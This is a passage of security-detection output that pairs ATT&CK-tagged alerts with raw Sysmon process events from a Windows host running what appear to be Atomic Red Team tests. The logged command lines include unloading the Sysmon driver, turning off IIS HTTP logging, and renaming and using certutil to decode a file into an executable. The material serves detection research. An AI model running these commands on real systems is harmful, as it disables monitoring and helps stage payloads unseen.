<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:14.991615Z"">
</TimeCreated>
<EventRecordID>4077</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:14.972</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-00107A2C3D00</Data>
<Data Name=""ProcessId"">2584</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\System32\inetsrv\appcmd.exe set config &quot; &quot;Default /section:httplogging /dontLog:true&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:14.944276Z"">
</TimeCreated>
<EventRecordID>4076</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:14.928</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-00106C293D00</Data>
<Data Name=""ProcessId"">4056</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\System32\inetsrv\appcmd.exe set config &quot; &quot;Default /section:httplogging /dontLog:true&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:14.758535Z"">
</TimeCreated>
<EventRecordID>4075</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:14.745</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-0010EE223D00</Data>
<Data Name=""ProcessId"">1012</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;fltmc.exe unload SysmonDrv&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:14.715974Z"">
</TimeCreated>
<EventRecordID>4074</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:14.696</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-0010C21F3D00</Data>
<Data Name=""ProcessId"">3976</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;fltmc.exe unload SysmonDrv&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.643015Z"">
</TimeCreated>
<EventRecordID>4073</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.529</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010E16B3C00</Data>
<Data Name=""ProcessId"">264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.361122Z"">
</TimeCreated>
<EventRecordID>4069</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.346</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010565D3C00</Data>
<Data Name=""ProcessId"">3932</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA40-5D31-0000-0010CF5A3C00</Data>
<Data Name=""ParentProcessId"">4336</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.333864Z"">
</TimeCreated>
<EventRecordID>4068</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.316</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010CF5A3C00</Data>
<Data Name=""ProcessId"">4336</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.294575Z"">
</TimeCreated>
<EventRecordID>4067</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.256</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010B1553C00</Data>
<Data Name=""ProcessId"">5168</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA40-5D31-0000-00106A543C00</Data>
<Data Name=""ParentProcessId"">6572</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.270645Z"">
</TimeCreated>
<EventRecordID>4066</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:04.236</Data>
<Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-00106A543C00</Data>
<Data Name=""ProcessId"">6572</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:04.210561Z"">
</TimeCreated>
<EventRecordID>4065</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.938</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-0010813E3C00</Data>
<Data Name=""ProcessId"">7140</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -decode file.txt c:\file.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
</TimeCreated>
<EventRecordID>4064</EventRecordID>
<Correlation>
</Correlation>
